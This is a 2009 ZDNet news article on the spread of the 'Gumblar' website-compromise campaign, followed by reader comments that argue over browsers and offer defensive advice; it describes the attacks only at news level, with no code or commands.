madison
Home / News & Blogs

'Gumblar' web attacks spreading quickly

Matthew Broersma ZDNet.co.uk | May 19, 2009 4:43 AM PDT

Summary

The attackers behind a series of rapidly spreading website compromises have begun using a new domain to deliver their malicious code.

Topics

Malicious Code, Web, ScanSafe, Domain, Web Site, Attack, Gumblar, Web Site Development, Web Technology, Internet, security, virus, malware, Matthew Broersma ZDNet.co.uk
The attackers behind a series of rapidly spreading website compromises have begun using a new domain to deliver their malicious code, security experts said on Monday.

The attacks, collectively referred to as 'Gumblar' by ScanSafe and 'Troj/JSRedir-R' by Sophos, grew 188 percent over the course of a week, ScanSafe said on Thursday. The Gumblar infections accounted for 42 percent of all infections found on websites last week, Sophos said on Thursday.

Over the weekend, the Chinese web domain used to deliver the malicious code — gumblar.cn — stopped responding, according to Unmask Parasites, a service used to detect malicious code embedded in web pages. The attacks' malicious payload has, however, continued to be delivered from a different source, the martuz.cn domain, Unmask Parasites said in an advisory published on Monday.

"They have slightly modified the script and now inject a new version that loads malicious content from a new domain," Unmask Parasites said in the advisory.

Changes to the script make it more difficult to identify and stop detection by the Google Chrome browser, Unmask Parasites said.

Gumblar was first detected in March and has spread more and more quickly since then, against the expectations of security experts.

"A typical series of website compromises reaches peak within the first week or so and subsequently begins declining in intensity as detection is added by signature vendors, user awareness increases and website operators begin cleaning the affected sites," said ScanSafe senior security researcher Mary Landesman, in an advisory published on Thursday.

In the Gumblar attacks, the opposite is occurring, partly because website administrators themselves are affected by the attacks as they try to address the problem, ScanSafe said.

Sites affected include Tennis.com, Variety.com and Coldwellbanker.com, according to ScanSafe.

The attacks were carried out in multiple stages, beginning in March, when a number of websites were compromised and attack code embedded within them, ScanSafe said.

Then, in early May, as website operators began to clean up their sites, the attackers replaced the original malicious code with dynamically generated and heavily obfuscated JavaScript, meaning that the scripts change from page to page and are difficult for security tools to spot.

The scripts attempt to exploit vulnerabilities in Adobe's Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer, ScanSafe said.

They also search the victim's system for FTP credentials that can be used to compromise further websites, the firm said.

The malicious code embedded on a user's system was previously downloaded from gumblar.cn, a Chinese domain associated with Russian and Latvian IP addresses, delivering code from servers based in the UK, according to ScanSafe. That domain has now changed to martuz.cn.

This article was first posted on ZDNet UK.

Talkback Most Recent of 24 Talkback(s)

  • RE: 'Gumblar' web attacks spreading quickly
    "The scripts attempt to exploit vulnerabilities in Adobe's Acrobat Reader and Flash Player to deliver code that injects malicious search results when a user searches Google on Internet Explorer..."

    Sorry Windows guys, but really, Internet Explorer AGAIN! Please get people to use Firefox!

    Phil S.
    ZDNet Gravatar
    Serenicom
    19th May 2009
  • Not another My browser is better than yours post...
    I use Firefox, IE, and Chrome, depending on the
    tasks best suited to them. Does this mean I am 3
    times more exposed, 2 thirds less exposed, or just
    mathematically challenged?
    ZDNet Gravatar
    cneale@...
    19th May 2009
  • lol
    ZDNet Gravatar
    LiLac22281
    21st May 2009
  • Read it and weep...there are plenty of browser holes to go around.
    http://www.mozilla.org/security/known-vulnerabilities/firefox30.html

    sad
    ZDNet Gravatar
    IT_Guy_z
    19th May 2009
  • Not really....this is not so much about browsers
    Recent reports have shown that the automatic update feature of FF allows fixes to be applied quickly to a large percentage of FF users, making any attempt to utilize any of the bugs you highlighted a complete waste of time. These bugs are already fixed for the vast majority of persons using FF, and almost everyone will be using the latest version, 3.0.10.

    In any case, this attack is actually targeting the Adobe Reader and the Flash player plug-in that IE users are using (an active X plug-in), not browser vulnerabilities present in IE. When the victim visits an infected site, they get redirected to the Gumblar website which then pushes an infected pdf unto the PC as well as attempts to use a flash exploit. Once on the PC, the malware disables things like regedit, antivirus software and cmd, looks for ftp client passwords, and redirects your Google searches to sites that usually also push malware. It's unclear to me if the latest version of Adobe Reader is vulnerable - i'm seeing conflicting reports online. Turning off Javascript in Adobe Reader until the problem is solved is probably wise. Updating flash to the latest version 10 is also necessary. FF users can further protect their PCs with NoScript.
    ZDNet Gravatar
    eMJayy
    19th May 2009
  • Secunia PSI ...
    can also help keep your apps up to date. I've been hit with one of these attacks and because my Adobe was updated, NOD32 was able to kick butt within seconds after three attacks in a row!

    Using host file blockers like the FireFox plugin Adblock Plus, Spyware Blaster, and AdAware's Adwatch can go a long way toward mitigating these threats also. Getting auto updates is even a better idea.

    My clients refuse to use NoScript, and they refuse to block iFrames and Java. And why should they? Why give in to the "terrorists"?

    I run the minefields so I can find out how to deal with the dangers; it is a good education in the war with malware.
    ZDNet Gravatar
    JCitizen
    20th May 2009
  • Why weep...
    Those exploits are fixed within a matter of hours.

    IE (and it's HACtiveX hole) might be updated the next Tuesday of the next month if you're lucky.
    ZDNet Gravatar
    Wintel BSOD
    20th May 2009
  • Read again!
    It's not just IE that have issues with this exploit:

    "Changes to the script make it more difficult to identify and stop detection by the Google Chrome browser, Unmask Parasites said."
    ZDNet Gravatar
    Parassassin
    20th May 2009
  • FireFox
    Why would I want to use FireFox? It was ONCE a good option and the better browser but not anymore. I've actually stop using it in favour of other browers.

    Instead of moaning about browsers and cussing IE why not instead have a go at Adbobe for releasing products that are the cause of so many of these flaws?

    Yes it attacks IE but THROUGH Flash. So surely why not just say to people don't install Active X or Reader as this will make your system far more secure.
    ZDNet Gravatar
    Average-IT-Guy
    20th May 2009
  • Unless you need web functinality..
    why give in to the "terrorists"? There are many free wares out there that block these threats.

    Many of them work in tandem and don't interfer with modern AV solutions.

    Just read the user reviews at CNET(download.com)
    ZDNet Gravatar
    JCitizen
    20th May 2009
  • Why I use Firefox
    I use Firefox on both Linux and Windows. I have adblock Plus and Flashblock installed, so flash only runs it I want it to, hence no sneak attacks.

    I also do not use the Adobe reader for PDF files, I use Foxit! reader in Windows, and the built in PDF reader in Ubuntu. Once again, no problems, they don't run Javascript, Et. Al.

    It's not perfect, nothing is, but with this combo in Linux, it is about as secure as I can get, and when I have to run Windows, it also works pretty well when used with a little common sense.

    Phil S.
    ZDNet Gravatar
    Serenicom
    24th May 2009
  • Last time I attempted to use Foxit..
    Secunia PSI reported it as unsecure. Perhaps the Linux version is okay, however.
    ZDNet Gravatar
    JCitizen
    25th May 2009
  • Adobe update.
    I have flash and acrobat reader updated. Am i safe or not?.
    ZDNet Gravatar
    magallanes
    20th May 2009
  • You still need AV and AS solutions as well..
    By keeping those updated the likelyhood that the bugs could take administrative control are reduced significantly.

    But you would have to be running as a restricted user, to help with this, to mitigate the threat.

    CNET(download.com) has many good freeware solutions reviewed by users, that you could download to help fight such attacks, both on the administrative and restricted side of your PC accounts.
    ZDNet Gravatar
    JCitizen
    25th May 2009
  • RE: Add ons aren't the solution
    A solution that requires someone to pore over web reviews at download.com to keep their browser safe is a non answer.

    Business just wants things to work.

    It's why Flash and Adobe caught on - it just works, and it works the same no matter what browser.

    Everyone rants on IE, and it deserves a share fo this, but as others pointed out, so does Adobe, in spades.

    == John ==
    ZDNet Gravatar
    jgwinner
    20th May 2009
View More Comments

Talkback - Tell Us What You Think

Formatting +
BB Codes - Note: HTML is not supported in forums
  • [b] Bold [/b]
  • [i] Italic [/i]
  • [u] Underline [/u]
  • [s] Strikethrough [/s]
  • [q] "Quote" [/q]
  • [ol][*] 1. Ordered List [/ol]
  • [ul][*] · Unordered List [/ul]
  • [pre] Preformat [/pre]
  • [quote] "Blockquote" [/quote]

The best of ZDNet, delivered

ZDNet Newsletters

Get the best of ZDNet delivered straight to your inbox

Facebook Activity